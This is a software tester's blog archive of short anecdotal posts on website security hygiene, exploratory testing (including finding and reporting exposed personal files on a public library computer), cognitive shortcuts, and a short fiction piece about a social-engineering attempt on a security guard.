Category Archives: Secure things

Security by Luck

Last week I saw the attack vectors of the most popular attack on
WordPress web sites at the moment.
Just two lines.

Was I prepared? Yep.

In my mail box I had a message, that my web site was updated. It was completely automatic.

I did not even have to press a button. Self service is nice, good service is better. I had the last version of WordPress running. All minor updates are automatically deployed.

Why did I choose WordPress? For one of my test assignments I had to test a WordPress web site. And I did not want to learn another tool to maintain a web site. Sheer luck.

Last year I got an insistent mail from my host provider, that I should upgrade my PHP. The advised version was a safer one.

I dutifully followed the instructions: pressing buttons instead of typing long commands after the prompt. There was nothing scary about.

How did I select my web site host?
I looked for a provider, who provided all kinds of handy services: e-mail, backup, and web site statistics.

“Sheer luck mate. “
“Really? “
“I compared several providers. The one I chose also focused on companies. If I ever would scale up, I had a company, who could help me. “

“Can you be more specific? “

“Sure. I looked for the information on the web site. It was written in a way that I could advise it to a company.

It had also enough tech background information. That was good for my inner nerd. “

“Wait a minute. “
“Yep. “
“You just told, which Content Management System you use for your web site. And that you are using PHP. Are you not exposing too much information? “

“A real hacker can determine this information within seconds. He looks at the source code or using some plug ins.
On my smartphone I have Dual HTML Viewer which is a similar tool.”
“How did you find that mobile tool? “
“#30daysoftesting

You could call it luck. I prefer to bend it.“

No comments please

Seth Godin once gave the advise to turn off comments in a web site. If the blog post would be interesting enough, then they had to refer to it. Free publicity.

This time saver was a nice advice for me. Yes, I like good comments. Sorry, I focus on writing.

This year I started to test on XSS or Cross Site Scripting attacks. I basically added information to a web site, which changed the behaviour.

If I add html code to a comment, then the comment can be shown in bold or italic. Sometimes it is possible to add extra feature like a window. This can be used to distribute confidential information to other people. Without their permission.

No comment disabled the use of XSS. Luck? Not really.
Seth let me think in another way.

BTW Seth did advise to use comments in the very same blog post.
It is nice to read good things about my blog posts. But for me time is (my) precious.

Don’t be too infectious

One of the criteria to choose my own web site host was full control over the content of my blog. Even I had to pay for it.

There are web sites which provide free web sites, SSL and nice domain names. Their business model or their way to earn money is advertisements on my web site. Of course I can disable it by paying.

On a security conference a Finnish guy showed how advertisements can be misused. He contacted to a web page with a single bad pixel. His system was contaminated within milliseconds. Life on stage.

Reading the right stuff

During one of my visits I saw a familiar computer magazine on the table: “I read it also.”
“It is good.”, was the answer. He also works in the IT, so I valued his input.

Once I read about WordPress tools. There are a lot which are free. So I scheduled my backup and restricted the access with a special tool kit. Sometimes I feel lucky to find easy to use tools.

A Case of Bad Luck
Within two days after pushing my first piece of this blog post on the web I found two annoying items on the web.

Santosh Tuppad had considerable considerations about the use of WordPress by hospitals. And Santosh is a good security tester.

Kristine Corbus, another tester, blogged about the misuse of headers in WordPress.

Then I had a story of Troy Hunt lingering in my memory. He used another Software as a Service for his web site.

“You wrote Troy.”
“It is not a city in ancient Greece, which had the first bad encounter with a Trojan horse.”
“Who’s Troy?”
“It’s the guy who reported about the bleeding cloud and the eavesdropping teddy bears. Troy is a security expert I follow by luck.”

Was I lucky?

Losing gracefully

“Han Toan, something has to be tested.”
I got a short briefing, csv files and decent specifications. A senior tester and I had to test an interface. He started sprinting: opening a csv file and logging bugs. I froze. No time for writing test cases and reviewing them. I confessed to the tester, that I was uncomfortable with the situation. I tested a csv file, but I was losing gracefully.

Theory and practice revisited

The following text is translation of a text I found in a Dutch farm:

“Theory is: if one knows everything and nothing is right.

Practice is: if everything functions and nobody knows why.

In this company theory and practice are combined.

Nothing is right and nobody knows why.”

Learning to win

One evening I was playing Skip-Bo with my wife. My plan was to lose gracefully. So I forced myself to play the wrong cards. Her position in the game improved gradually. She was happy, so was I.

After a while I was holding too many good cards in my hand. There was no way, that I could hide them for long. I would either win or lose awkwardly. The last option was worse than the first one.

In the months after this clumsy situation I tried to repeat the steps during other games. What was the first wrong move I made? What were my following strange steps? Based on my observations I was able to extract a single rule to win or heuristic.

I think, that I might be able to find scientific evidence for my heuristic. But I chose not to, because it worked. That was my goal.

No log in required
During an afternoon session James Bach told about testing without scripts. He was in a hotel lobby and saw a computer. He described the techniques and heuristics he used to get access to this computer. At the end he succeeded.  

I was in the library. Killing my time with browsing newspaper articles. But that was not exciting after a while. I had an appointment within half an hour. In the meantime there should be something to be tested. I was still staring at the computer, when I remembered the story of James.

The computer environment had 2 access levels for normal users. A guest could use only basic functions, which were also limited. I did not have a library subscription, which would grant me a time slot to use standard office software and the browser. I could buy a time slot, but that would lower the challenge.

So I started testing the applications. There were many search engines for news and books. Then I noticed, that I could open the browser. It did not take me much time to go the download area. A document with Resume in the title drew my attention. I expected an error message, when I would attempt to open the file.

Then I actually opened the file. I had access to Word. And to personal data like name, address, birth day, …. I got more information than I had anticipated.

It was time to inform the information desk about this particular situation. One of the women acted adequately:
“Did you log in?”
“No. I did not log in.”
One brief look on the computer screen made her check the other computers in the library. She asked me the steps to reproduce the error. After my answer she continued with:
“After logging out the cache should be cleared. I’ll contact the system administrator about this situation. ”

I went back to the computer, which still showed the resume. I closed it. Then I noticed, that a pdf reader had been installed on the PC. One of the recently opened files contained passport in the name. One click gave me a high resolution full colour scan of a passport including social security number and picture of a fellow citizen.

I had made a little start. To explore in unknown environment. Without a script.

Déjà vu

Story number 1

My wife and I were enjoying the sun set. We had settled ourselves on a bench with cushions on the beach. A waiter came in our view:
What would you like to drink?
My wife answered:
“One hot chocolate milk please.”
“With or without whipped cream?”
“Without whipped cream.”
Then it was my turn to order a drink:
“One tea without whipped cream. ”
When the waiter went away, my wife remarked something about my joke.

After a few minutes the waiter came back with two hot chocolate milks without whipped cream.
“I did not order this beverage.”
“You ordered a hot chocolate milk without whipped cream. ”
“I ordered a tea without whipped cream. ”
The waiter was silent for a few moments. Then he offered me to bring me a tea.

Story number 2

When I was looking for a parking space for the car, one of my kids said:
“That car has the same colour.”
I said something like “A huh”.

I parked the car and my wife left to do some fast shopping. I stayed with the kids. After a few minutes I noticed movement in the rearview mirror. My wife had changed her coat, hair colour and glasses. And she had shopped.

“Something is wrong.” flashed through my mind. I turned around to have a good look. The woman looked me straight in the eyes. She was surprised. Her view shifted to the license plate. Then she looked to me with an apologising smile.

She slowly turned around, looking for her car. Then her eyes fell on a car with the same colour, the same model and the same brand. And off she went.

Breakdown

The waiter and the woman have some things in common: first they used the auto pilot (System 1). Then they forced themselves to think (System 2). This leads to the following graph:mindful-tester-deja-vu-systems-timeline

Back to business

The following story is fiction. So enjoy.  

Steve was waiting for things to happen. For more than one hour it was just him and his pen. The other stuff was boring: the same people moving on the screens in the same patterns. He noticed, that a pizza delivery boy parked his car on the parking lot. He just knew, that it was a pizza delivery boy. While many of his colleagues were regarding strangers as potential criminals, he just looked and knew.

The young man came to his desk:
“One large pepperoni pizza for mister Neal.”
“Sorry”, Steve replied. “You are not allowed to deliver, because your delivery is not on the list.”
Then a phone call came in.
“Hi Steve, John here. I forgot to notify you, that a pizza would be delivered.”
Steve checked off the following points:

  • It was the internal phone number of John.
  • He had an American accent with Scottish accent.
  • He was always late with meal notifications.

“Sure, no problem. One pizza coming up.”
“Fine. I’m hungry.”
Steve thought: “He always is.”.
He said to the pizza delivery boy:
“You can go the 6th floor. Mister Neal is wearing a T shirt.”
Steve thought: “He always is.”.
The young man nodded and entered the elevator.

Outside a car stopped. The same man came to Steve’s desk. Steve looked at the first car, which was still parked outside. There was something wrong. The pizza delivery boy looked genuine.
“He’s real.”, flashed through his mind.
Steve asked: “One large pepperoni pizza for mister Neal?”
“That’s right. Can I deliver the pizza?” with the same voice.
Steve looked at the monitor, which showed the same delivery boy in the elevator.

He looked to the pizza delivery boy.
“I have to write down the delivery time.”, while tapping 3 times on his watch. 3 short taps is S in morse: Social engineering threat. He felt 3 short vibrations of his watch. Now Steve had 3 minutes to evaluate the situation, before the alarm went off.

In the meantime another pizza delivery boy with the same face had come to his desk:
“One large pepperoni pizza for mister Neal.”
The same face, the same suit and the same voice.
“He’s not an actor. The body language is from a reluctant man trying to earn extra money for his study.”
Steve looked to the two pizza delivery boys standing for his desk: they looked like twins.

John was a hungry programmer: he ordered at most two pizzas at a time. Steve recalled, that John had ordered just one pizza. He pressed his two hand palms on the desk to push himself up. This way he concealed two small movements. With his right index finger he pushed the Down The River button. People inside the building could only leave the building: elevators would only go downstairs; doors would only open to the hallway. Etcetera etcetera. Annoyance crept in Steve’s mind:
“This is the real thing and my intuition failed me for the first time.”

With his left index finger he locked the control panel in front of him. While Steve was standing at ease, he casually placed his right palm on his watch. The watch scanned his palm and vibrated for half a sec: the alarm was confirmed. He imagined himself as a concrete wall. Now he had to stall, until the backup would come. The guitar music from the opening scene of Pulp Fiction started to play in his head. He defocused to get a better view of the situation. This way he could see the two pizza delivery boys and the entrance at the same time. Then tensome pizza delivery boys entered the building. Packed with pizza boxes. The trumpets in his head began to play harder.